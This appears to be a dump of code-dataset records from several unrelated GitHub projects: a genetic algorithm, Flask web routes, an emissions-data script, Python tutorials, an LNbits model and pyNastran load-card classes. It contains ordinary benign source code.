(遺伝子p1と遺伝子p2の適応度の値を入れ替える) */\n fitness[p1], fitness[p2] = fitness[p2], fitness[p1]\n\n\n#/**********************************************************************\n# 個体番号 p1 の適応度と遺伝子型を p2 にコピー\n# 引数 p1, p2 : 遺伝子の番号\n# gene[p][i] : 遺伝子pのi番目の成分\t\t\t\t \n# fitness[p] : 遺伝子pの適応度\n#**********************************************************************/\ndef copy_gene(p1, p2, gene, fitness):\n# /* 遺伝子のコピー (遺伝子p1を遺伝子p2にコピーする) */\n gene[p2] = gene[p1][:]\n\n# /* 適応度のコピー (遺伝子p1の適応度を遺伝子p2の適応度にコピーする)*/\n fitness[p2] = fitness[p1]\n\n\n#/**********************************************************************\n# エリート保存\n# (最小適応度の個体に最大適応度の個体のデータをコピー)\n# 引数 gene[p][i] : 遺伝子pのi番目の成分\t\t\t\t \n# fitness[p] : 遺伝子pの適応度\n#**********************************************************************/\ndef elite(gene, fitness):\n# /* 最大適応度の個体(max_p)と最小適応度の個体(min_p)を見つける */\n max_p = max(enumerate(fitness), key=lambda x:x[1])[0]\n min_p = min(enumerate(fitness), key=lambda x:x[1])[0]\n\n# /* 最小適応度の個体に最大適応度の個体をコピー */\n copy_gene(max_p, min_p, gene, fitness)\n# /* 最大適応度の個体を0番目に移動 */\n swap_gene(0, max_p, gene, fitness)\n\n\n#/**********************************************************************\n# ルーレット選択\n# 引数 gene[p][i] : 遺伝子pのi番目の成分\t\t\t\t \n# fitness[p] : 遺伝子pの適応度\n#**********************************************************************/\ndef reproduction(gene, fitness):\n# /* ルーレットの1周分 sum_of_fitness を求める */\n sum_of_fitness = sum(fitness) #/* 個体の適応度の総和 */\n new_gene = list(range(POP_SIZE))\n\n# /* ルーレットを POP_SIZE 回だけ回して次世代の個体を選ぶ */\n# /* 選ばれた個体の番号 p i */\n for p in range(POP_SIZE):\n# /* ルーレットを回して場所を選ぶ \n# r : 選ばれた位置 (0 <= r <= sum_of_fitness) */\n r = sum_of_fitness * random() #/* ルーレット上の選択位置 */\n\n# /* 選ばれた場所に該当する個体が何番か調べる\n# num : 選ばれた個体の番号 (0 <= num <= POP_SIZE-1) */\n num = 0 #/* 選ばれた個体の番号 */\n\n border = fitness[0] #/* ルーレット上の個体間の境界 */\n while border < r:\n num += 1\n border += fitness[num]\n\n# /* 遺伝子の代入 */\n new_gene[p] = gene[num][:]\n\n# /* 遺伝子のコピー */\n for i in range(1, len(gene)):\n gene[i] = new_gene[i]\n\n\n#/**********************************************************************\n# 一点交叉\n# 引数 gene[p][i] : 遺伝子pのi番目の成分\t\t\t\t \n#**********************************************************************/\ndef crossover(gene):\n# /* 交叉位置を1〜G_LENGTH-1の範囲でランダムに決め、\n# それより後ろを入れ替える。\n# gene[1]とgene[2], gene[3]とgene[4] ... のように親にする */\n c_pos = randint(1, G_LENGTH - 1) #/* 交叉位置 (1 <= c_pos <= G_LENGTH-1) */ \n for p in range(1, len(gene) - 1, 2):\n for i in range(c_pos, G_LENGTH):\n #/* 親1の遺伝子型 gene[p][i]*/ \n #/* 親2の遺伝子型 gene[p + 1][i]*/ \n gene[p][i], gene[p + 1][i] = gene[p + 1][i], gene[p][i]\n\n\n#/**********************************************************************\n# 突然変異\n# 引数 gene[p][i] : 遺伝子pのi番目の成分\t\t\t\t \n#**********************************************************************/\ndef mutation(gene):\n# /* 0〜1の乱数を発生させ、その値が M_RATE 以下ならば\n# 遺伝子の値をランダムに変える (0ならば1、1ならば0) */\n for g in gene[1:]:\n for i, v in enumerate(g):\n if random() < M_RATE:\n g[i] = (not v) * 1\n\n\n#/**********************************************************************\n# メインプログラム\n#**********************************************************************/\n#/* シミュレーション条件の表示 */\nprint(\"個体数 : %d\" % POP_SIZE);\nprint(\"遺伝子長 : %d bit\" % G_LENGTH);\nprint(\"突然変異率 : %lf\" % M_RATE);\n\ngene = [[0 for j in range(G_LENGTH)] for i in range(POP_SIZE)]\nfitness = [0 for x in range(POP_SIZE)]\n\ngene = init_gene(gene) #/* 遺伝子の初期化 */\ncalc_fitness(gene,fitness) #/* 適応度の計算 */\nshow_gene(0,gene,fitness) #/* 表示 */\n\nfor t in range(1, MAX_GEN + 1):\n print(\"<< 世代数 : %d >>\" %t)\n elite(gene, fitness) #/* エリート保存 */ \n reproduction(gene, fitness) #/* ルーレット選択 */ \n crossover(gene) #/* 単純交叉 */ \n mutation(gene) #/* 突然変異 */ \n calc_fitness(gene, fitness) #/* 適応度の計算 */\n show_gene(t, gene, fitness) #/* 表示 */\n","repo_name":"ctare/osn","sub_path":"GA/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7862,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34543144126","text":"from flask import render_template, url_for, flash, redirect, request\nfrom flask_login import current_user, login_user, logout_user, login_required\nfrom app import app, db\nfrom app.forms import LoginForm, RegistrationForm, AnswerForm, UserPreferencesForm, UserSettingsForm\nfrom app.models import User, Question, Answer\nfrom werkzeug.urls import url_parse\nfrom datetime import datetime\n\n\n@app.before_request\ndef before_request():\n if current_user.is_authenticated:\n current_user.last_seen = datetime.utcnow()\n db.session.commit()\n\n\n@app.route('/')\n@app.route('/browse')\n@app.route('/browse/')\n@login_required\ndef browse():\n return render_template('browse.html', title='Browse')\n\n\n@app.route('/login', methods=['GET', 'POST'])\n@app.route('/login/', methods=['GET', 'POST'])\ndef login():\n if current_user.is_authenticated:\n return redirect(url_for('browse'))\n form = LoginForm()\n if form.validate_on_submit():\n user = User.query.filter_by(username=form.username.data).first()\n if user is None or not user.check_password(form.password.data):\n flash(f'Invalid username or password')\n return redirect(url_for('browse'))\n login_user(user, remember=form.remember_me.data)\n\n next_page = request.args.get('next')\n if current_user.last_seen:\n # Set next_page to browse if not set and also set it to browse in case external website is provided\n if not next_page or url_parse(next_page).netloc != '':\n next_page = url_for('browse')\n else:\n next_page = url_for('user_preferences')\n return redirect(next_page)\n return render_template('login.html', form=form, title='Login')\n\n\n@app.route('/logout')\n@app.route('/logout/')\ndef logout():\n logout_user()\n return redirect(url_for('browse'))\n\n\n@app.route('/register', methods=['GET', 'POST'])\n@app.route('/register/', methods=['GET', 'POST'])\ndef register():\n if current_user.is_authenticated:\n return redirect(url_for('browse'))\n form = RegistrationForm()\n if form.validate_on_submit():\n user = User(username=form.username.data, email=form.email.data)\n user.set_password(password=form.password.data)\n db.session.add(user)\n db.session.commit()\n flash(f'Thanks for registering!')\n return redirect(url_for('login'))\n return render_template('register.html', form=form, title='Register')\n\n\n@app.route('/profile')\n@app.route('/profile/')\n@login_required\ndef user_profile():\n return redirect(url_for('profile', username=current_user.username))\n\n\n@app.route('/profile/', methods=['GET', 'POST'])\n@app.route('/profile//', methods=['GET', 'POST'])\ndef profile(username):\n user = User.query.filter_by(username=username).first_or_404()\n questions = Question.query.filter_by(type='summary').all()\n return render_template('profile.html', user=user, questions=questions, Answer=Answer, title=user.username)\n\n\n@app.route('/answer/', methods=['GET', 'POST'])\n@app.route('/answer//', methods=['GET', 'POST'])\n@login_required\ndef answer(id):\n # Figure out if answer already exists\n question = Question.query.get(int(id))\n answer = Answer.query.filter_by(question=question).first()\n\n form = AnswerForm()\n # If answer doesn't yet exist\n if answer is None:\n if form.validate_on_submit():\n answer = Answer(body=form.body.data, author=current_user, question=question)\n db.session.add(answer)\n db.session.commit()\n flash(f'Your response has been recorded')\n return redirect(url_for('profile', username=current_user.username))\n elif request.method == 'GET':\n form.body.data = answer.body\n # Validate an existing answer\n elif form.validate_on_submit():\n answer.body = form.body.data\n db.session.commit()\n flash(f'Your response has been edited')\n return redirect(url_for('profile', username=current_user.username))\n return render_template('answer.html', form=form, question=question, title='Answer')\n\n\n@app.route('/settings')\n@app.route('/settings/')\n@login_required\ndef settings_menu():\n return render_template('settings_menu.html', title='Settings')\n\n\n@app.route('/preferences', methods=['GET', 'POST'])\n@app.route('/preferences/', methods=['GET', 'POST'])\n@login_required\ndef user_preferences():\n form = UserPreferencesForm()\n questions = Question.query.filter_by(type='Basic').all()\n #TODO- Test preferences and finish UserPreferencesForm validation\n return render_template('user_preferences.html', form=form, title='Preferences')\n\n\n@app.route('/user_settings', methods=['GET', 'POST'])\n@app.route('/user_settings/', methods=['GET', 'POST'])\n@login_required\ndef user_settings():\n form = UserSettingsForm(current_user.email, current_user.username)\n if request.method == 'GET':\n form.email.data = current_user.email\n form.username.data = current_user.username\n form.gender.data = current_user.gender\n form.birthday.data = current_user.birthday\n form.city.data = current_user.city\n form.state.data = current_user.state\n form.zip_code.data = current_user.zip_code\n form.privacy.data = current_user.privacy\n elif form.validate_on_submit():\n current_user.email = form.email.data\n current_user.username = form.username.data\n current_user.gender = form.gender.data\n current_user.birthday = form.birthday.data\n current_user.city = form.city.data\n current_user.state = form.state.data\n current_user.zip_code = form.zip_code.data\n current_user.privacy = form.privacy.data\n db.session.commit()\n flash(f'Your settings have been updated')\n return redirect(url_for('settings_menu'))\n return render_template('user_settings.html', form=form, title='User Settings')\n","repo_name":"dtfrancisco/Lang-Match","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":5905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25158048916","text":"import os\nfrom pandas import DataFrame, read_excel\n\nyear = 2012\ntransport_dir = os.environ['TRANSPORT_DIR']\n\n# Emissions\nprint('Processing EDGAR data')\n\nresults_df = DataFrame()\ndata_dir = transport_dir + '/edgar_data/'\nunit_scale = 1e9 / 1e12\nemissions_files = ['v432_CO2_excl_short-cycle_org_C_1970_2012', 'v432_CO2_org_short-cycle_C_1970_2012'\n , 'v432_PM2.5_fossil_1970_2012', 'v432_PM2.5_bio_1970_2012', 'v432_PM10_1970_2012'\n , 'v432_CH4_1970_2012', 'v432_NOx_1970_2012', 'v432_SO2_1970_2012', 'v432_N2O_1970_2012'\n , 'v432_BC_1970_2012', 'v432_CO_1970_2012', 'v432_NMVOC_1970_2012']\n\ntransport_cats = ['Domestic aviation', 'Road transportation', 'Rail transportation', 'Inland navigation'\n , 'Other transportation']\n\ninternational_cats = ['Int. Shipping', 'Int. Aviation']\n\n# Calculate totals for 2012\nfor file in emissions_files:\n\n # Read raw data\n print('Reading ' + file)\n df = read_excel(data_dir + file + '.xls', header=7)\n\n totals = {}\n running_total = 0\n\n for tt in transport_cats:\n cat_total = df[df['IPCC_description'] == tt][year].sum() * unit_scale\n totals[tt] = cat_total\n running_total = running_total + cat_total\n\n for it in international_cats:\n cat_total = df[df['Name'] == it][year].sum() * unit_scale\n totals[it] = cat_total\n running_total = running_total + cat_total\n\n totals['all_other'] = (df[year].sum() * unit_scale) - running_total\n\n # Append to results container\n totals['filename'] = file\n results_df = results_df.append(totals, ignore_index=True)\n\nresults_df.to_csv(transport_dir + '/edgar_transport_summary.csv')\n\n# Calculate trend in CO2\nprint('Calculating trend in transport emissions')\nco2_emissions_files = ['v432_CO2_excl_short-cycle_org_C_1970_2012', 'v432_CO2_org_short-cycle_C_1970_2012']\n\ndf_co2 = read_excel(data_dir + co2_emissions_files[0] + '.xls', header=7)\ndf_short = read_excel(data_dir + co2_emissions_files[1] + '.xls', header=7)\n\nresults = []\n\nfor trend_year in range(2000, 2013):\n totals = {'year': trend_year}\n\n series_name = 'co2_sc'\n for it in international_cats:\n cat_total = df_co2[df_co2['Name'] == it][trend_year].sum() * unit_scale\n totals[series_name + '_' + it] = cat_total\n\n totals[series_name + '_total'] = df_co2[trend_year].sum() * unit_scale\n\n series_name = 'co2_excl_sc'\n for it in international_cats:\n cat_total = df_short[df_short['Name'] == it][trend_year].sum() * unit_scale\n totals[series_name + '_' + it] = cat_total\n\n totals[series_name + '_total'] = df_short[trend_year].sum() * unit_scale\n\n results.append(totals)\n\nDataFrame(results).to_csv(transport_dir + '/edgar_intl_transport_trend.csv')\n\nprint('All finished')","repo_name":"spottedquoll/get_transport_emissions","sub_path":"edgar_emissions.py","file_name":"edgar_emissions.py","file_ext":"py","file_size_in_byte":2791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12251353468","text":"def cats_and_dogs(cats_file, dogs_file):\n \n print(\"All Cats\")\n try:\n with open(cats_file) as catfile:\n cats = catfile.readlines()\n for cat in cats:\n print(cat.rstrip())\n except FileNotFoundError as fe:\n print(f\"{fe.filename} not found\")\n\n print(\"\\nAll Dogs\")\n try: \n with open(dogs_file) as dogfile:\n dogs = dogfile.readlines()\n for dog in dogs:\n print(dog.rstrip())\n except FileNotFoundError as fe:\n print(f\"{fe.filename} not found\")\n \ncats_and_dogs(\"cats.txt\", \"dogs1.txt\")","repo_name":"apulijala/python-crash-course","sub_path":"chapter10/cats_and_dogs.py","file_name":"cats_and_dogs.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29342099062","text":"import numbers\nimport pickle\nimport time\nfrom collections import UserDict\n\n\nclass Car:\n # 类变量, 所有实例共有\n # 如果使用可变对象会导致所有实例互相影响\n author = 'zcx'\n\n def __init__(self, name, model):\n # 实例变量 每个实例独有\n self.name = name\n self.model = model\n\n def show(self):\n print(self.name, self.model)\n\n\na = Car(1, 2)\nCar.show = lambda x: print(123)\na.show() # 123\n\n\n# inherit 继承Car\nclass ECar(Car):\n def __init__(self, name, model, battery):\n super().__init__(name, model)\n self.battery = battery\n # 带有一个下划线的名称 (例如 _spam) 约定当作是API的非公有部分\n # 双下划线私有属性会自动名称改写(name mangling)\n # 替换为_[类名]__[属性名] _ECar__id\n self.__id = time.time()\n\n def __iter__(self):\n \"\"\"\n 变为可迭代对象 支持拆包\n *self\n name, model, battery = c\n \"\"\"\n return (i for i in (self.name, self.model, self.battery))\n\n # property 实现访问控制 通过getter setter和deleter访问\n # 默认会生成一个getter\n @property\n def id(self):\n ...\n\n @id.getter\n def id(self):\n return self.__id\n\n def __bytes__(self):\n return pickle.dumps(self)\n\n # 类方法\n # 使用类调用(也可以使用实例调用) e.g. C.f() or C().f()\n # 第一个参数永远是类本身(不需要调用者传) cls表示类本身 self表示类的一个实例\n @classmethod\n def from_bytes(cls, bytes):\n return pickle.loads(bytes)\n\n # 静态方法\n # 使用类调用(也可以使用实例调用) e.g. C.f() or C().f() 本质就是普通函数\n @staticmethod\n def hello_world():\n print(\"hello world\")\n\n def __hash__(self, h=0):\n for attr in self:\n h ^= hash(attr)\n return h\n\n def __eq__(self, other):\n for s, o in zip(self, other):\n if s != o:\n return False\n return True\n\n def show(self):\n print(*self)\n\n\nc = ECar('byd', 'han', 'kylin')\nc.show()\ne = ECar.from_bytes(bytes(c))\ne.show()\nprint(e is c) # False\nprint(hash(e))\n\n# 名称改写 e.__id AttributeError: 'ECar' object has no attribute '__id'\nprint(list(filter(lambda x: 'id' in x, dir(e)))) # ['_ECar__id']\n\n# 访问控制 e.id = 5 AttributeError: property 'id' of 'ECar' object has no setter\ne._ECar__id = 5\n\nprint(e.id is e._ECar__id) # True\nprint(e.__dict__) # {'name': 'byd', 'model': 'han', 'battery': 'kylin', '_ECar__id': 5}\n\n\nclass Student:\n # slots 规约类的所有属性, 值为一个可迭代的字符串对象\n # 实例不能使用 __slots__ 中所列名称之外的其他属性\n # 不再创建__dict__和__weakref__属性, 可以节省内存, 加快访问属性速度\n # 子类不会继承 __slots__ 属性, 如果需要作为弱引用的对象, 需要在 __slots__ 中加入 '__weakref__'\n __slots__ = ('id', 'name')\n\n def __init__(self, id, name):\n self.id = id\n self.name = name\n # self.x = 1 AttributeError: 'Student' object has no attribute 'x'\n\n\ns = Student(1, 'abc')\n\n\n# print(s.__dict__) AttributeError: 'Student' object has no attribute '__dict__'.\n\n\nclass MyDict(dict):\n # 内置类型的子类覆盖方法不会隐式调用\n def __setitem__(self, key, value):\n print('no set', self)\n return\n\n\nd = MyDict(a=1, b=2, c=3)\nprint(d) # {'a': 1, 'b': 2, 'c': 3}\nd['c'] = 4 # no set {'a': 1, 'b': 2, 'c': 3}\nd.update(c=5)\nprint(d) # {'a': 1, 'b': 2, 'c': 5}\n\n\n# __init__和update时忽略了覆盖的__setitem__ 没有在子类中搜索该方法\n\n# 内置类型的原生方法使用 C 语言实现, 不会调用子类中覆盖的方法, 不过有极少数例外\n# 因此, 需要定制 list, dict 或 str 类型时, 子类化 UserList, UserDict 或 UserString 更简单\nclass MyDictV2(UserDict):\n def __setitem__(self, key, value):\n print('no set')\n\n\nd = MyDictV2(a=1, b=2, c=3) # no set no set no set\nprint(d) # {}\n\n\nclass Father():\n def ping(self):\n print('father: ', self)\n\n\nclass Son(Father):\n def pong(self):\n print('son: ', self)\n\n\nclass Daughter(Father):\n def pong(self):\n print('daughter: ', self)\n\n\nclass Dog(Son, Daughter):\n\n def daughter_pong(self):\n # 通过类调用实例方法,必须显式传入self参数,因为这样访问的是未绑定方法(unbound method)\n Daughter.pong(self)\n\n\nd = Dog()\nd.ping() # father: <__main__.Dog object at 0x104bdefd0>\nd.pong() # son: <__main__.Dog object at 0x104bdefd0> 根据超类声明顺序调用\nd.daughter_pong() # daughter: <__main__.Dog object at 0x104bdefd0>\nprint(Dog.__mro__)\n\n\n# (, , ,\n# , )\n# 方法解析顺序简单来说是深度优先, 从左至右, 不重复搜索\n# 实际上动态算法会用一种特殊方式将搜索顺序线性化, 保留每个类所指定的从左至右的顺序,\n# 只调用每个父类一次,并且保持单调(即一个类可以被子类化而不影响其父类的优先顺序)\n\n\n# 查看方法解析顺序\ndef print_mro(cls):\n print(' '.join(c.__name__ for c in cls.__mro__)) # 生成器对象用空格隔开\n\n\nprint_mro(bool) # bool int object\nprint_mro(numbers.Complex) # Complex Number object\n\n\n# 特殊方法会保存在对象的类型中而不是实例中\nclass C:\n pass\n\n\na = C()\n# print(len(a)) # TypeError: object of type 'C' has no len()\na.__len__ = lambda: 5\n# print(len(a)) # TypeError: object of type 'C' has no len()\n\nC.__len__ = lambda x: 5\nprint(len(a)) # 5\n","repo_name":"FAuditore/python-basic","sub_path":"class.py","file_name":"class.py","file_ext":"py","file_size_in_byte":5702,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"23778218736","text":"tamanho=int(input(\"digite quantos numeros serão multiplicados: \"))\r\n\r\nproduto = 1\r\n\r\ni=0\r\n \r\nwhile i \"ScrubLink\":\n data = dict(row)\n return cls(**data)\n\n def lnurl(self, req: Request) -> str:\n url = req.url_for(\"scrub.api_lnurl_response\", link_id=self.id)\n return lnurl_encode(url)\n","repo_name":"lnbits/scrub","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"14829769646","text":"# pylint: disable=R0902,R0904,R0914\n\"\"\"\nAll static loads are defined in this file. This includes:\n\n * LOAD\n * GRAV\n * ACCEL\n * ACCEL1\n * FORCE / MOMENT\n * FORCE1 / MOMENT1\n * FORCE2 / MOMENT2\n * MOMENT\n * PLOAD\n * PLOAD2\n * PLOAD4\n * PLOADX1\n\n\"\"\"\nfrom __future__ import (nested_scopes, generators, division, absolute_import,\n print_function, unicode_literals)\nfrom six.moves import zip\n\nimport numpy as np\nfrom numpy import array, cross, allclose, unique\nfrom numpy.linalg import norm # type: ignore\n\n#from pyNastran.bdf.errors import CrossReferenceError\nfrom pyNastran.utils import integer_types, float_types\nfrom pyNastran.bdf.cards.loads.loads import Load, LoadCombination\nfrom pyNastran.bdf.field_writer_8 import set_blank_if_default\nfrom pyNastran.bdf.cards.base_card import BaseCard, expand_thru, expand_thru_by, range # _node_ids,\nfrom pyNastran.bdf.cards.collpase_card import collapse_thru_by\n\nfrom pyNastran.bdf.bdf_interface.assign_type import (\n integer, integer_or_blank, double, double_or_blank, string, string_or_blank,\n integer_or_string, fields, integer_string_or_blank, integer_or_double)\nfrom pyNastran.bdf.field_writer_8 import print_card_8, print_float_8, set_string8_blank_if_default\nfrom pyNastran.bdf.field_writer_16 import (\n print_card_16, print_float_16, set_string16_blank_if_default)\nfrom pyNastran.bdf.field_writer_double import print_card_double, print_scientific_double\n\n\nclass LOAD(LoadCombination):\n \"\"\"\n +------+-----+------+------+----+-----+----+----+----+\n | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 |\n +======+=====+======+======+====+=====+====+====+====+\n | LOAD | SID | S | S1 | L1 | S2 | L2 | S3 | L3 |\n +------+-----+------+------+----+-----+----+----+----+\n | | S4 | L4 | etc. | | | | | |\n +------+-----+------+------+----+-----+----+----+----+\n | LOAD | 101 | -0.5 | 1.0 | 3 | 6.2 | 4 | | |\n +------+-----+------+------+----+-----+----+----+----+\n \"\"\"\n type = 'LOAD'\n\n def __init__(self, sid, scale, scale_factors, load_ids, comment=''):\n \"\"\"\n Creates a LOAD card\n\n Parameters\n ----------\n sid : int\n load id\n scale : float\n overall scale factor\n scale_factors : List[float]\n individual scale factors (corresponds to load_ids)\n load_ids : List[int]\n individual load_ids (corresponds to scale_factors)\n comment : str; default=''\n a comment for the card\n\n .. note:: MSC can handle self-referencing loads, NX cannot\n \"\"\"\n LoadCombination.__init__(self, sid, scale, scale_factors, load_ids,\n comment=comment)\n\n def get_load_types(self):\n \"\"\"\n .. note:: requires a cross referenced load\n \"\"\"\n load_types = []\n for loads in self.load_ids:\n for load in loads:\n if isinstance(load, LOAD):\n lid = load.lid\n if isinstance(lid, list):\n load_types += load.type\n else: # int\n load_types += [load.type] + load.get_load_types()\n elif isinstance(load, (Force, Moment, PLOAD4, GRAV)):\n load_types += [load.type]\n else:\n raise NotImplementedError(load)\n\n load_types = list(set(load_types))\n #print(\"load_types = \", load_types)\n return load_types\n\n def get_reduced_loads(self, resolve_load_card=False, filter_zero_scale_factors=False):\n \"\"\"\n Get all load objects in a simplified form, which means all\n scale factors are already applied and only base objects\n (no LOAD cards) will be returned.\n\n Parameters\n ----------\n resolve_load_card : bool; default=False\n Nastran requires that LOAD cards do not reference other load cards\n This feature can be enabled.\n filter_zero_scale_factors : bool; default=False\n Nastran does not filter loads with a 0.0 scale factor. So, if you\n have a 0.0 load, but are missing load ids, Nastran will throw a\n fatal error.\n\n .. todo:: lots more object types to support\n \"\"\"\n scale_factors = []\n loads = []\n simple_loads = [\n 'FORCE', 'FORCE1', 'FORCE2',\n 'MOMENT', 'MOMENT1', 'MOMENT2',\n 'PLOAD1', 'PLOAD2', 'PLOAD4',\n 'GRAV', 'ACCEL', 'ACCEL1']\n load_scale = self.scale # global\n for (loads_pack, i_scale) in zip(self.load_ids, self.scale_factors):\n scale = i_scale * load_scale # actual scale = global * local\n if isinstance(loads_pack, integer_types):\n raise RuntimeError('the load have not been cross-referenced')\n if scale == 0.0 and filter_zero_scale_factors:\n continue\n\n for load in loads_pack:\n if simple_loads:\n loads.append(load)\n scale_factors.append(scale) # local\n elif isinstance(load, LOAD):\n if not resolve_load_card:\n msg = (\n 'A LOAD card cannot reference another LOAD card\\n'\n 'current:\\n%s\\n'\n 'new:\\n%s' % (str(self), str(load))\n )\n raise RuntimeError(msg)\n load_data = load.get_reduced_loads(\n resolve_load_card=True,\n filter_zero_scale_factors=filter_zero_scale_factors)\n (reduced_scale_factors, reduced_loads) = load_data\n\n loads += reduced_loads\n scale_factors += [scale * j_scale\n for j_scale in reduced_scale_factors]\n else:\n msg = ('%s isnt supported in get_reduced_loads method'\n % load.__class__.__name__)\n raise NotImplementedError(msg)\n return (scale_factors, loads)\n\n def cross_reference(self, model):\n \"\"\"\n Cross links the card so referenced cards can be extracted directly\n\n Parameters\n ----------\n model : BDF()\n the BDF object\n \"\"\"\n load_ids2 = []\n msg = ', which is required by LOAD=%s' % (self.sid)\n for load_id in self.load_ids:\n if load_id == self.sid:\n msg = 'Type=%s sid=%s load_id=%s creates a recursion error' % (\n self.type, self.sid, load_id)\n raise RuntimeError(msg)\n load_id2 = model.Load(load_id, consider_load_combinations=True, msg=msg)\n assert isinstance(load_id2, list), load_id2\n load_ids2.append(load_id2)\n self.load_ids_ref = load_ids2\n\n def safe_cross_reference(self, model, xref_errors, debug=True):\n load_ids2 = []\n msg = ', which is required by LOAD=%s' % (self.sid)\n for load_id in self.load_ids:\n try:\n load_id2 = model.Load(load_id, consider_load_combinations=True, msg=msg)\n except KeyError:\n if debug:\n msg = 'Couldnt find load_id=%i, which is required by %s=%s' % (\n load_id, self.type, self.sid)\n print(msg)\n continue\n load_ids2.append(load_id2)\n self.load_ids_ref = load_ids2\n\n def raw_fields(self):\n list_fields = ['LOAD', self.sid, self.scale]\n load_ids = self.get_load_ids()\n for (scale_factor, load_id) in zip(self.scale_factors, load_ids):\n list_fields += [scale_factor, self.LoadID(load_id)]\n if len(load_ids) != len(self.scale_factors):\n msg = 'nload_ids=%s nscale_factors=%s and arent the same\\n' % (\n len(load_ids), len(self.scale_factors))\n msg = 'load_ids=%s\\n' % (load_ids)\n msg += 'scale_factors=%s\\n' % (self.scale_factors)\n msg += print_card_8(list_fields)\n raise IndexError(msg)\n return list_fields\n\n def repr_fields(self):\n return self.raw_fields()\n\n def write_card(self, size=8, is_double=False):\n card = self.raw_fields()\n if size == 8:\n return self.comment + print_card_8(card)\n else:\n return self.comment + print_card_16(card)\n\n def uncross_reference(self):\n self.load_ids = self.get_load_ids()\n self.load_ids_ref = None\n\n\nclass GRAV(BaseCard):\n \"\"\"\n Defines acceleration vectors for gravity or other acceleration loading.\n\n +------+-----+-----+------+-----+-----+------+-----+\n | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 |\n +======+=====+=====+======+=====+=====+======+=====+\n | GRAV | SID | CID | A | N1 | N2 | N3 | MB |\n +------+-----+-----+------+-----+-----+------+-----+\n | GRAV | 1 | 3 | 32.2 | 0.0 | 0.0 | -1.0 | |\n +------+-----+-----+------+-----+-----+------+-----+\n \"\"\"\n type = 'GRAV'\n\n def __init__(self, sid, scale, N, cid=0, mb=0, comment=''):\n \"\"\"\n Creates an GRAV card\n\n Parameters\n ----------\n sid : int\n load id\n scale : float\n scale factor for load\n N : (3, ) float ndarray\n the acceleration vector in the cid frame\n cid : int; default=0\n the coordinate system for the load\n mb : int; default=0\n ???\n comment : str; default=''\n a comment for the card\n \"\"\"\n if comment:\n self.comment = comment\n\n #: Set identification number\n self.sid = sid\n\n #: Coordinate system identification number.\n self.cid = cid\n\n #: scale factor\n self.scale = scale\n\n #: Acceleration vector components measured in coordinate system CID\n self.N = np.asarray(N)\n\n #: Indicates whether the CID coordinate system is defined in the\n #: main Bulk Data Section (MB = -1) or the partitioned superelement\n #: Bulk Data Section (MB = 0). Coordinate systems referenced in the\n #: main Bulk Data Section are considered stationary with respect to\n #: the assembly basic coordinate system. See Remark 10.\n #: (Integer; Default = 0)\n self.mb = mb\n self.cid_ref = None\n\n assert not allclose(max(abs(self.N)), 0.), ('GRAV N is a zero vector, '\n 'N=%s' % str(self.N))\n\n def validate(self):\n if not isinstance(self.scale, float):\n msg = 'scale=%s type=%s' % (self.scale, type(self.scale))\n raise TypeError(msg)\n\n @classmethod\n def add_card(cls, card, comment=''):\n \"\"\"\n Adds a GRAV card from ``BDF.add_card(...)``\n\n Parameters\n ----------\n card : BDFCard()\n a BDFCard object\n comment : str; default=''\n a comment for the card\n \"\"\"\n sid = integer(card, 1, 'sid')\n cid = integer_or_blank(card, 2, 'cid', 0)\n scale = double(card, 3, 'scale')\n N = array([double_or_blank(card, 4, 'N1', 0.0),\n double_or_blank(card, 5, 'N2', 0.0),\n double_or_blank(card, 6, 'N3', 0.0)])\n mb = integer_or_blank(card, 7, 'mb', 0)\n assert len(card) <= 8, 'len(GRAV card) = %i\\ncard=%s' % (len(card), card)\n return GRAV(sid, scale, N, cid=cid, mb=mb, comment=comment)\n\n @classmethod\n def add_op2_data(cls, data, comment=''):\n \"\"\"\n Adds a GRAV card from the OP2\n\n Parameters\n ----------\n data : List[varies]\n a list of fields defined in OP2 format\n comment : str; default=''\n a comment for the card\n \"\"\"\n sid = data[0]\n cid = data[1]\n unused_a = data[2]\n N = array(data[3:6])\n mb = data[6]\n scale = 1.\n assert len(data) == 7\n return GRAV(sid, scale, N, cid=cid, mb=mb, comment=comment)\n\n def get_loads(self):\n return [self]\n\n #def transform_load(self):\n #g = self.GravityVector()\n #g2 = self.cid_ref.transform_node_to_global(g)\n #return g2\n\n def cross_reference(self, model):\n \"\"\"\n Cross links the card so referenced cards can be extracted directly\n\n Parameters\n ----------\n model : BDF()\n the BDF object\n \"\"\"\n msg = ', which is required by GRAV sid=%s' % self.sid\n self.cid_ref = model.Coord(self.cid, msg=msg)\n\n def safe_cross_reference(self, model, xref_errors, debug=True):\n # msg = \"Couldn't find CORDx=%s which is required by GRAV sid=%s\" % (self.cid, self.sid)\n msg = ', which is required by GRAV sid=%s' % self.sid\n self.cid_ref = model.safe_coord(self.cid, self.sid, xref_errors, msg=msg)\n\n def uncross_reference(self):\n self.cid = self.Cid()\n self.cid_ref = None\n\n def Cid(self):\n if self.cid_ref is not None:\n return self.cid_ref.cid\n return self.cid\n\n def GravityVector(self):\n \"\"\"returns the gravity vector in absolute coordinates\"\"\"\n if self.Cid() == 0:\n return self.N\n ## TODO: shouldn't be scaled by the ???\n p = self.cid_ref.transform_vector_to_global(self.N)\n return self.scale * p\n\n def raw_fields(self):\n N = list(self.N)\n list_fields = ['GRAV', self.sid, self.Cid(), self.scale] + N + [self.mb]\n return list_fields\n\n def repr_fields(self):\n N = []\n for n in self.N:\n N.append(set_blank_if_default(n, 0.0))\n\n mb = set_blank_if_default(self.mb, 0)\n list_fields = ['GRAV', self.sid, self.Cid(), self.scale] + N + [mb]\n return list_fields\n\n def write_card(self, size=8, 